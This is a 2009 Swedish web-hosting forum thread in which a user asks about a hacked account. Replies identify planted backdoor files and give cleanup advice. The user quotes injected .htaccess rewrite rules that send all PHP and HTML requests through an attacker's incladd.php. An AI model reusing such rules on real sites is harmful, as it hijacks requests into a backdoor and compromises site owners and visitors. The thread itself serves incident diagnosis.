WN - Hacking av mitt webbkonto

WN (https://www.wn.se/forum/index.php)

- Serversidans teknologier (https://www.wn.se/forum/forumdisplay.php?f=4)

- - Hacking av mitt webbkonto (https://www.wn.se/forum/showthread.php?t=36092)

vidir

2009-04-02 14:08

Hej!

jag fick nyligen ett av mina webbkonto hackade:

Jag hittade detta i min .htaccess:

RewriteCond /home/mittkonto/public_html/minkatalog/incladd.php -f
RewriteCond %{REQUEST_URI} !incladd.php$
RewriteCond %{REQUEST_URI} !16e414.php$
RewriteRule ^.*\.(php[s345]?|[ps]?html?).*$ /minkatalog/incladd.php?file=%{SCRIPT_FILENAME}&%{QUERY_STRING } [NC,L]
RewriteCond %{REQUEST_URI} !148dea.php$

känner ni till vad detta gör?

<_<

Jonas

2009-04-02 15:29

Kolla vad filen "incladd.php" & "16e414.php" gör.

16e414.php är troligen en bakdörr för att få kontroll över servern.

En sökning på Google gav informationen om att det rör hål i Coppermine & Joomla!

Töm din .htaccess & radera filerna.

Uppdatera all mjukvara du har på ditt konto till det senaste.

vidir

2009-04-02 15:50

tack,, skulle sparat filerna först,, men jag raderade dom direkt ;-)

har dock inte jomla eller coppermine installerat..

Jonas

2009-04-02 16:10

Okej, har du WordPress då?

Eftersom söker man på "incladd.php" så dyker det upp resultat från Coppermine, Joomla! & Wordpress sidor främst.

Men alla är eniga, radera filerna & ta bort raderna i .htaccess.

hnn	2009-04-02 18:02

Byt lösenord i på ditt konto och kontrollera dina loggar efter dom filerna.

tartareandesire

2009-04-02 18:31

Det finns ju också en möjlighet att de kommit åt kontot på andra vägar än genom Wordpress eller Joomla. I så fall är det allvarligare.

Alla tider är GMT +2. Klockan är nu 16:45.